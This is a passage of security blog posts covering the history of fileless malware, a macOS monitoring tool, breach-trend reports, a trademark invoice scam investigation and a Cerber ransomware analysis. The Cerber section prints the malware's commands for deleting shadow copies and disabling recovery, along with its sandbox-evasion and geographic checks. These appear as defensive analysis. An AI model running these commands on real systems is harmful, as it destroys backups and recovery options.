Closer to the end of 2014, security researcher MalwareTech documented a fileless rootkit named Phase Bot. According to its advertisement, the specimen achieved stealth “by installing on windows systems without dropping any files to disk and not having it’s own process. […] Phase hids it’s relocatable code encrypted in the registry and uses powershell to read and execute this position independent code into memory.” Like Poweliks, this malware maintained persistence by launching rundll32.exe from an autorun registry key to execute JavaScript.

2014-2015: Duqu 2.0, Kovter

In mid-2015, Kaspersky Labs published details about an advanced adversary that operated in 2014-2015 using a sophisticated malware platform that the vendor called Duqu 2.0. The attack utilized a Windows vulnerability to install stealthy malware that remained solely in memory of the infected host. It did not implement a persistence mechanism. Instead, the researchers explained, the attackers targeted servers with high uptime and then re-infected the systems that got “disinfected by reboots.”

Another fileless malware specimen that gained attention in 2015 was Kovter. In that incarnation, Kovter’s infection technique closely resembled that of Poweliks. Even when starting the infection with a malicious Windows executable, the specimen removed that file after storing obfuscated or encrypted artifacts in the registry. At least one of its variations maintained persistence by using a shortcut file that executed JavaScript. As outlined by Andrew Dove at Airbus, this script launched PowerShell, which executed shellcode, which launched a non-malicious application after injecting malicious code into it.

2016: PowerSniff, PowerWare, August

In mid-2016, Josh Grunzweig and Brandon Levene at Palo Alto Networks documented a malicious program they dubbed PowerSniff. The infection began with a Microsoft Word document that contained a malicious macro. The in-memory mechanics of this specimen resembled some aspects of Kovter and involved a PowerShell script that executed shellcode, which decoded and executed additional malicious payload, operating solely in memory. PowerSniff had the ability to temporarily save a malicious DLL to the file system.

A couple of weeks later, Mike Sconzo and Rico Valdez at Carbon Black described a ransomware specimen they called PowerWare. Like PowerSniff, PowerWare began its infection with a Microsoft Office document that contained a malicious macro, which ultimately launched PowerShell that continued the infection process without placing malicious executables on the file system.

Another fileless malware sample that utilized Microsoft Word macros and PowerShell was documented later in the year by Proofpoint. It was named August. According to the researchers, the specimen downloaded a portion of a payload “from the remote site as a PowerShell byte array,” executing it in memory without saving it to the file system.

2017: POSHSPY, etc.

In early 2017, Kaspersky Labs described an unnamed incident where adversaries stored Meterpreter-based malicious code solely in memory. The only file system artifacts were legitimate Windows utilities such as sc (to install a malicious service that ran PowerShell) and netsh (to tunnel malicious network traffic).

Several months later, Matthew Dunwoody at Mandiant described another sophisticated attack that involved fileless malicious code. Named POSHSPY, the specimen used Windows Management Instrumentation (WMI) capabilities of the OS to maintain persistence and relied on PowerShell for its payload. The specimen had the ability to download executable files, which it would save to the file system. Matthew concluded that:

By “living off the land,” this adversary implemented “an extremely discrete backdoor that they can deploy alongside their more conventional and noisier backdoor families, in order to help ensure persistence even after remediation.”

The incidents above highlighted the powerful capabilities available to intruders even when they rely solely on built-in benign programs to execute malicious payload on the infected systems.

Alternatives to Saying “Fileless Malware”

Sergey Golovanov’s 2012 article mentioned above originally used the term fileless malware. Interestingly, it has been revised and now uses the term bodiless malware instead. Kaspersky Labs experimented with saying bodiless malware as late as 2016, but it seems to have returned to fileless malware in other writeups in 2017.

Speaking of the terms that didn’t take off… The notion of Advanced Volatile Threat (AVT) gained some buzz in 2013 after, according to Wikipedia, being coined by John Prisco of Triumfant Inc. The short-lived AVT moniker popped up in Byron Acohido’s USA Today article in 2013 in reference to a backdoored version of Apache software. According to Pierre-Marc Bureau, who was at ESET at that time, the backdoor left “no traces of compromised hosts on the hard drive other than its modified” web server binary.

In contrast, a reasonable alternative to the term fileless malware was introduced by Carbon Black in its 2016 Threat Report. The report used the phrase non-malware attacks. Writing on the company’s blog a few months later, Michael Viscuso explained the meaning of this term like this:

“A non-malware attack is one in which an attacker uses existing software, allowed applications and authorized protocols to carry out malicious activities. Non-malware attacks are capable of gaining control of computers without downloading any malicious files, hence the name. Non-malware attacks are also referred to as fileless, memory-based or ‘living-off-the-land’ attacks.”

Gartner used the term “non-malware attack” in a 2017 report that highlighted Carbon Black. However, another Gartner report published a month later used “fileless attacks” instead.

Why Does It Matter?

I like the idea of saying “non-malware attacks” for incidents that rely solely on legitimate system administration tools and other non-malicious software. This is the scenario that some people describe as living-off-the-land. In contrast, I might prefer to say “memory-only malware” if I need to point out that malicious code is never saved to disk, perhaps because it was injected into another process. I’m even OK with saying “fileless malware” when the focus is on persistence mechanisms that avoid placing traditional executables on the file system.

Unfortunately, nowadays the terminology has been commingled, and we’re probably stuck with the term “fileless malware” to describe the various scenarios outlined above, despite the term’s ambiguity. Alas, human language is imprecise and always-evolving. (If we all spoke C#, perhaps the world would be a better place.)

I care about this terminology because I’m trying to avoid buzzwords and empty phrases when describing the capabilities of the anti-malware product for which I’m responsible at Minerva. It runs alongside other endpoint security tools and blocks all sorts of sneaky malware, regardless of whether its payload touches disk. I’m often asked how we handle fileless malware; I decided to perform the research above to better understand how and when I should use this term.

Introducing Monitor for macOS

UPDATE (April 4, 2018): Monitor now supports macOS 10.13.

For a malware analyst or systems programmer, a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from Microsoft’s legendary Sysinternals Suite. Those tools only work on Windows, though, and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used tools such as DTrace, a very powerful tracing subsystem built into the core of macOS. While it is powerful and efficient, it commonly required us to write D scripts to get at the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of Monitor for macOS, a simple GUI application for monitoring common system events on a macOS host. Monitor captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY events

Monitor identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features: a start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on the types of data we want to search for across all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a Time Machine backup were to kick off while the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.
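
Conceptually, an “Any” search is just a substring match across every field of every event. The sketch below illustrates that behavior; it is not Monitor’s actual code, and the event fields are invented for illustration:

```python
def match_any(event: dict, term: str) -> bool:
    """Return True if the search term appears in any field of the event."""
    term = term.lower()
    return any(term in str(value).lower() for value in event.values())

# Invented sample events resembling process and file activity records.
events = [
    {"type": "process", "path": "/usr/bin/curl", "args": "https://xkcd.com/"},
    {"type": "file", "path": "/tmp/notes.txt", "args": ""},
]
hits = [e for e in events if match_any(e, "xkcd")]
print(len(hits))  # 1
```

Scoped filters (matching only a specific field, or suppressing a whole event class) follow the same pattern with the search restricted to one key.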

As an example, suppose we were interested in seeing any processes that communicated with xkcd.com. We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Monitor. Please send us any feature requests and bug reports.

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better at identifying breaches. The global median time from compromise to discovery has dropped significantly, from 146 days in 2015 to 99 days in 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

Joining Minerva Labs to Keep Malware in Check

As much as I look forward to change sometimes, I am often hesitant to forego the familiar despite recognizing the risks of becoming too comfortable in the same job. Fortunately, I’ve come across an opportunity to take on a new role that matches all three professional objectives I defined for myself:

  • Contribute towards advancing the practice of information security.
  • Grow commercial businesses whose value is tied to securing information.
  • Help organizations in their fight against malicious software.

I’m joining a young anti-malware company Minerva Labs as VP of Products. I’m taking on this role not only because it’ll allow me to curtail the effectiveness of malware on endpoints, but also because I love the character and ingenuity of the people that built Minerva. The position will allow me to continue teaching malware analysis at SANS Institute and maintain the REMnux toolkit, which is consistent with the above-mentioned objectives.

Why Minerva Labs?

Minerva’s underlying technology is focused on controlling how malware perceives its reality. What if you could fool malware into thinking it’s running in an analysis sandbox, causing it to stop executing to avoid revealing its true nature? What if you could make ransomware believe it’s encrypting files while blocking the encryption and backing up the user’s files? What if you could simulate the presence of infection markers that malware checks to avoid infecting the system twice?

I’ve written about similar ideas before (immunization, ransomware), yet dreaming up ideas is the easy part. The folks at Minerva actually managed to create products that make it feasible to employ such deception-based approaches in the real world. I’m joining them to continue evolving this platform and the technologies that could be built upon it.

I was also impressed by Minerva’s attention to the practicality of deploying their products in production. Extremely lightweight agent; no reboots to install or upgrade; no irrelevant alerts. Strengthen the security architecture without expecting the enterprise to overhaul it. Not only work alongside existing anti-malware solutions, but also help them reach their full potential.

Oops, is this starting to sound like a sales pitch? Sorry, I felt inclined to explain my reasons and share my excitement about this step in my professional journey. It’s kind of a big deal.

Getting to Know Minerva

By the way, Eddy Bobritsky, Minerva’s CEO, recently participated in the Startup Security Weekly podcast. This interview, which you can watch below, explains Minerva’s objectives and gives you a chance to hear from some of the people behind the company.

If you are working to better protect your organization’s systems and have a wish-list for ideas you’d like to see in an anti-malware solution, let me know. What would you like to see in an innovative endpoint security product? What’s your take on the way Minerva positions its approach? I’d love to hear your thoughts. Also, if you want to get to take a closer look at our products, I’ll be glad to schedule a discussion and arrange a demo.


Reflections of a Security Professional: Podcast Interview

Life rushes forward at the speed of a bullet train. I struggle finding the time to pause and reflect upon the journey travelled and the direction in which I’m heading. Fortunately, I had the opportunity to consider key moments in my professional endeavours so far during the interview that Doug Brush conducted with me for the Cyber Security Interviews podcast.

If you’d like to know what events and decisions have affected my career to date, you might find this interview of interest. You’ll learn a bit about me and also hear what I’ve learned along the way.

You can listen to the interview using the embedded player below or at the official podcast page:


The topics we covered during the conversation include:

  • Getting started and making progress in information security
  • The need for business, communication and other non-techie skills
  • The role of professional certifications and formal education
  • The challenges of seeking advice and learning from failures
  • Being inspired by, interacting with, and learning from others

I found the interview strangely therapeutic and enjoyed talking about myself for a change :-) But beyond it being all about me, me, me, perhaps other members of the community might benefit from the experiences I shared during the conversation. Thanks, Doug, for taking the interest in speaking with me.

M-Trends Asia Pacific: Organizations Must Improve at Detecting and Responding to Breaches

Since 2010, Mandiant, a FireEye company, has presented trends, statistics and case studies of some of the largest and most sophisticated cyber attacks. In February 2016, we released our annual global M-Trends® report based on data from the breaches we responded to in 2015. Now, we are releasing M-Trends Asia Pacific, our first report to focus on this very diverse and dynamic region.

Some of the key findings include:

  • Most breaches in the Asia Pacific region never became public. Most governments and industry-governing bodies are without effective breach disclosure laws, although this is slowly changing.
  • The median time of discovery of an attack was 520 days after the initial compromise. This is 374 days longer than the global median of 146 days.
  • Mandiant was engaged by many organizations that have already conducted forensic investigations (internally or using third parties), but failed to eradicate the attackers from their environments. These efforts sometimes made matters worse by destroying or damaging the forensic evidence needed to understand the full extent of a breach or to attribute activity to a specific threat actor.
  • Some attacker tools were used almost exclusively to target organizations within APAC. In April 2015, we uncovered the malicious efforts of APT30, a suspected China-based threat group that has exploited the networks of governments and organizations across the region, targeting highly sensitive political, economic and military information.

Download M-Trends Asia Pacific to learn more.

Misleading Trademark Registration Invoices and Scams

Miscreants are attracted to law-skirting schemes that generate strong revenues without significant ongoing investments. You can observe these characteristics in the trademark registration campaign described below. It seems to have been active for at least a decade and spans Texas, Delaware, Washington and the Principality of Liechtenstein. This is a manifestation of the broader set of fake invoice scams, such as the website backup “invoices” that I outlined in an earlier article.

Protected Trademarks on the Internet

After I registered the name of the malware analysis toolkit that I maintain, REMnux, as a trademark with the US Patent and Trademark Office, I began receiving postal solicitations requesting that I include this trademark in various private registries. You can see one of these letters below. (Click the image to see the PDF of the full page.)

The letter looks like an official invoice for trademark registration. In reality, the solicited $992 fee is for the proposed “service” that the notice describes in all capital letters as follows:



Buried in the paragraph that describes the offer is the phrase “THIS PUBLICATION IS AN ELECTIVE SERVICE WHICH NEITHER SUBSTITUTES THE REGISTRATION… WITH U.S.P.T.O.” So, the letter does indicate that it’s not associated with the US Patent and Trademark Office. Unfortunately, plenty of its recipients don’t look closely at what they assume are bills, and probably pay what they believe is an official trademark registration invoice.

Send This Stub With Check in the Remittance Envelope

Recipients of the letter are asked to make checks payable to Trademark-DB Corp and mail them to 10223 W Broadway St Ste P, PMB # 336, Pearland, TX 77584. This is the location of a UPS Store, pictured by Google’s Street View on the photo below. The term “PMB” means it’s a private mailbox, which is a private company’s version of a PO Box.

After some research, I came across another trademark registration company that was associated with the same fax number as Trademark-DB, 011-423-3841889. That company was called Trademark Info Corp. Its mailing address was the same UPS Store location, but it was using private mailbox number 330 instead of 336.

The “invoices” sent by Trademark Info looked very much like the letters from Trademark-DB, as you can see in the excerpt below. This solicitation appears to have been sent in 2006. I found it in the collection of trademark scam examples published by the firm Hodgson Legal, where you can see the full letter on page 4.


Based on the “invoices” I located for Trademark-DB, it was using the Texas location in 2015-2016. I came across additional invoices (1, 2) sent by this firm in 2013 and 2014 that specified a different address: 2207 Concord Pike, PMB # 582, Wilmington, DE 19803. This is a shop called My Mailbox Store, which, among other services, rents mailboxes.

Interestingly, this private mailbox number at this location was used in 2006 by a company called Americash Hotline, LLC d/b/a Direct Cash Express, LLC, which the Attorney General of the State of West Virginia accused of being “engaged in the business of making usurious payday loans to consumers” according to the Petition to Enforce Investigative Subpoenas filed that year. However, the use of the same mailbox by Trademark-DB ten years later might be a coincidence.

Another letter sent by Trademark-DB, probably dated 2015, uses the drop address of 2100 M St. NW, Ste 170, # 330, Washington, DC 20037. This is a UPS Store location. Note the use of the same mailbox number (330) as in the Texas location. Perhaps coincidentally, another mailbox (170) in the Washington store was reported to be associated with an unrelated award-acceptance scam in 2012.

Though the addresses where trademark letter recipients were urged to send payments were in the United States, both Trademark-DB and Trademark Info are located elsewhere.

Court of Vaduz, Principality of Liechtenstein

Trademark Info and Trademark-DB maintain separate websites. Each site includes a Terms of Business section stating that the companies are registered in the Principality of Liechtenstein, though at different addresses.

Liechtenstein is a small sovereign country nestled between Switzerland and Austria, according to Wikipedia. Its capital is Vaduz. Trademark-DB’s site states that:

“The Court of Vaduz, Principality of Liechtenstein, shall have exclusive jurisdiction over all claims or disputes arising in relation to, out of or in connection with Trademark-DB AG…”

I was able to locate Trademark-DB’s record in the Liechtenstein business registry. The mailing address of the company in Liechtenstein matches the one on Trademark-DB’s website, though the record also indicates that the correspondence should be sent care of Treufid Trust. This company’s website markets the firm as “your contact for start-ups and their management, accounting, tax and business consulting, auditing and secretarial services.” (I translated it from German via Google.)


I found Trademark Info’s record, too. It indicates that the company is in “in liquidation,” if I’m interpreting it correctly. This firm’s latest address is different from Trademark-DB’s address, and its point of contact is Kimar Anstalt. According to the Panama Offshore Leaks Database, it’s a subsidiary of Majoria Investments Limited, which the same database lists as being “defaulted.”

The two firms are clearly connected:

  • Both listed the same fax number on their letters, which included very similar content.
  • Both were using the same location in US as the drop point for checks. Both were registered in Liechtenstein, albeit at different addresses.
  • In addition, both specified the same phone number, 4233841077, in their domain registration records.
  • Moreover, a search of PassiveTotal records showed that the firms’ web servers employed the same DNS and registrar servers and at some point were assigned IP addresses on the same Class C subnet.
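
Checking whether two hosts sit on the same Class C (/24) subnet is a simple network comparison; here is a sketch using illustrative addresses (not the firms’ actual IPs):

```python
import ipaddress

def same_class_c(ip_a: str, ip_b: str) -> bool:
    """Return True if both IPv4 addresses fall in the same /24 network."""
    net_a = ipaddress.ip_network(f"{ip_a}/24", strict=False)
    return ipaddress.ip_address(ip_b) in net_a

# Documentation-range addresses used purely for illustration.
print(same_class_c("203.0.113.10", "203.0.113.200"))  # True
print(same_class_c("203.0.113.10", "198.51.100.7"))   # False
```

Shared subnets, name servers and registrars are weak signals on their own, but together they strengthen the case that two web properties are operated by the same party.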

I suspect Trademark Info was the first incarnation of the scheme and has now been dissolved. Trademark-DB seems like a reincarnation of the service, or perhaps it is a copycat effort. It is active as of this writing.

Unsecured Nonpriority Claims

Though Trademark Info as a company appears to have been liquidated, the database hosted on its site is still available. I found no way to browse its full contents, but one can perform searches to query the records. For instance, when I searched for records where the name of the trademark owner contained an “a”, the site showed me 20 records of companies with addresses in the US and Canada.

Presumably, each of these companies paid around $600 to be included in this listing, possibly because they misinterpreted the letter sent by Trademark Info as an invoice. The service for which they paid was of dubious value. As far as I can tell, search engines don’t include the site’s contents in their indexes, so people are unlikely to come across a trademark’s entry in this database unless they specifically search the database for it.

Another indication that companies issued payments to Trademark Info comes in the form of unclaimed funds that Texas Comptroller of Public Accounts is holding for the now-defunct company. I came across these records on the Texas government’s website that lets you search for such funds. It listed two unclaimed payments for $587 and two for $1,174, dating from 2005 to 2010.

Another example of the recipients treating Trademark Info’s letters as invoices can be seen in the petition that Mineola Water Corporation filed with the US Bankruptcy Court in Alabama. The company listed Trademark Info as a creditor “holding unsecured nonpriority claims” for its Sip of the South trademark in the amount of $596. The claim seems to be dated to 2008.

The database maintained by Trademark-DB is online as well. Like the Trademark Info catalog, the contents of this database do not seem to be available in search engines’ indexes. A few queries that I ran showed me various records registered between 2005 and 2012. It’s strange that I didn’t come across the more recent entries, given that I came across “invoices” that Trademark-DB sent between 2013 and 2015. I doubt people stopped responding, so perhaps the company stopped bothering to add new entries to its database? Or maybe the dates in its database are wrong?

Non-USPTO Solicitations

The US Patent and Trademark Office maintains a page that warns about “non-USPTO solicitations that may resemble official USPTO communications.” It includes several examples of what the page calls “non-USPTO solicitations about which we have received complaints within the past several months.” It carefully avoids using the term “scam,” except when referring to the criminal indictment issued against one of the listed entities.

Though the list of non-USPTO examples includes three letters sent by Trademark-DB (1, 2, 3) for its Texas, Washington and Delaware locations, the scheme involving Trademark-DB is still active. If it is, indeed, associated with the actions of Trademark Info, these machinations have been going on for at least a decade. The longevity of the campaign isn’t surprising, given the difficulty of tracking down the companies and individuals behind them, especially when the controlling organizations are in the Principality of Liechtenstein.

Yet, the checks are being collected from US-based locations, which can be used as a starting point for further investigating the schemes that, at best, push the boundaries of US laws.  For example, Title 39, United States Code, Section 3001, reportedly “makes it illegal to mail a solicitation in the form of an invoice, bill, or statement of account due unless it conspicuously bears a notice” stating that it’s not a bill. Furthermore, I wonder whether the lack of value in being listed in a private trademark registry might violate US federal and state laws that prohibit deceptive and unfair trade practices.

If you receive misleading communications from private trademark registration entities, the USPTO encourages you to file a complaint with the Federal Trade Commission (FTC). It also asks that you email the agency about any solicitations that are not already listed on the USPTO page mentioned above. Lastly, USPTO recommends that you report the incident to your state’s “consumer protection authorities,” which you can locate via this link.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient opened the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case, we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encoded mode – with the intention that PowerShell would download the ransomware and execute it without the victim’s knowledge.
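As a rough illustration of how a defender might triage such launch sequences, the sketch below flags PowerShell command lines that combine several of the evasion flags just described. The flag list and the two-hit threshold are hypothetical choices for illustration, not FireEye’s detection logic.

```python
# Hypothetical triage heuristic (not FireEye's detection logic): flag
# PowerShell command lines combining execution-policy bypass, a hidden
# window, or an encoded command, as described above.
SUSPICIOUS_FLAGS = ("-executionpolicy bypass", "-windowstyle hidden",
                    "-encodedcommand", "-noprofile")

def is_suspicious_powershell(cmdline: str) -> bool:
    line = cmdline.lower()
    if "powershell" not in line:
        return False
    # Two or more evasion flags together is treated as a strong signal.
    return sum(flag in line for flag in SUSPICIOUS_FLAGS) >= 2

print(is_suspicious_powershell(
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File x.ps1"))
```

In practice such a rule would be fed from process-creation telemetry; the threshold trades false positives (admin scripts) against missed single-flag launches.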

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware checks where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a randomly chosen filename taken from the %WINDIR%\system32 folder.

If the malware is launched from the aforementioned folder, then, after eliminating any blacklisted filenames from an internal list, it creates a renamed copy of itself at “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. The malware then executes the copy from the new location and cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber bypasses UAC checks, deletes any volume shadow copies and disables safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
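For defenders, these four command lines are high-fidelity indicators. The sketch below matches process launches against them; the tool names and argument fragments come from the commands above, while the matching logic itself is only illustrative.

```python
# Argument fragments taken from the backup-tampering commands listed above;
# the matching logic is an illustrative sketch, not a production detector.
TAMPER_INDICATORS = [
    ("vssadmin.exe", "delete shadows"),
    ("wmic.exe", "shadowcopy delete"),
    ("bcdedit.exe", "recoveryenabled no"),
    ("bcdedit.exe", "bootstatuspolicy ignoreallfailures"),
]

def backup_tampering_hits(process: str, args: str):
    """Return the indicators matched by a single process launch."""
    p, a = process.lower(), args.lower()
    return [(tool, frag) for tool, frag in TAMPER_INDICATORS
            if tool == p and frag in a]

print(backup_tampering_hits("Vssadmin.exe", "delete shadows /all /quiet"))
```

Because legitimate administration rarely deletes all shadow copies and disables recovery in one burst, even a single hit here usually warrants investigation.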


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4. Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).
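An analyst estimating exposure could walk a file share and list files carrying targeted extensions. The extension set below is a small illustrative subset; the full list of 294 extensions is not reproduced here.

```python
import os

# Partial extension set taken from this post; Cerber's full list has 294 entries.
TARGETED_EXTENSIONS = {".doc", ".ppt", ".jpg", ".ibank", ".wallet"}

def files_at_risk(root: str):
    """List files under root whose extensions appear in the targeted set."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in TARGETED_EXTENSIONS:
                hits.append(os.path.join(dirpath, name))
    return hits
```

Running such a sweep against backup targets is a cheap way to check whether the most exposed data is actually covered by offline backups.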

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online geolocation services to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers' geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).
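The check can be reconstructed as a simple lookup against those locale identifiers (LCIDs). The table below uses exactly the IDs listed above; the function is shown for analysis, not as the malware's actual code.

```python
# Reconstruction of the keyboard-layout check described above, using the
# locale IDs (LCIDs) listed in this post; shown for analysis, not reuse.
AVOIDED_LCIDS = {
    1049: "Russian", 1058: "Ukrainian", 1059: "Belarusian", 1064: "Tajik",
    1067: "Armenian", 1068: "Azeri (Latin)", 1079: "Georgian", 1087: "Kazakh",
    1088: "Kyrgyz (Cyrillic)", 1090: "Turkmen", 1091: "Uzbek (Latin)",
    2072: "Romanian (Moldova)", 2073: "Russian (Moldova)",
    2092: "Azeri (Cyrillic)", 2115: "Uzbek (Cyrillic)",
}

def would_abort(keyboard_lcid: int) -> bool:
    """Mirror of the malware's logic: abort infection on these layouts."""
    return keyboard_lcid in AVOIDED_LCIDS

print(would_abort(1049), would_abort(1033))  # True False; 1033 = English (US)
```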

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.
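Sandbox operators can turn the same artifact list around and verify that their analysis environment does not expose these telltale names. The artifact names below come from the list above; the snapshot structure is a hypothetical stand-in for real host telemetry.

```python
# Artifact names from this post; the snapshot format is a hypothetical example.
SANDBOX_MODULES = {"sbiedll.dll", "dir_watch.dll", "api_log.dll", "dbghelp.dll"}
SANDBOX_PATHS = {"c:\\popupkiller.exe", "c:\\stimulator.exe", "c:\\tools\\execute.exe"}
SANDBOX_PATH_FRAGMENTS = ("\\sand-box\\", "\\cwsandbox\\", "\\sandbox\\")
SANDBOX_SERIALS = {"0CD1A40", "6CBBC508", "774E1682", "837F873E", "8B6F64BC"}

def exposed_artifacts(snapshot: dict):
    """Return the sandbox giveaways visible in a host snapshot."""
    findings = []
    for module in snapshot.get("modules", []):
        if module.lower() in SANDBOX_MODULES:
            findings.append(("module", module))
    for path in snapshot.get("paths", []):
        lowered = path.lower()
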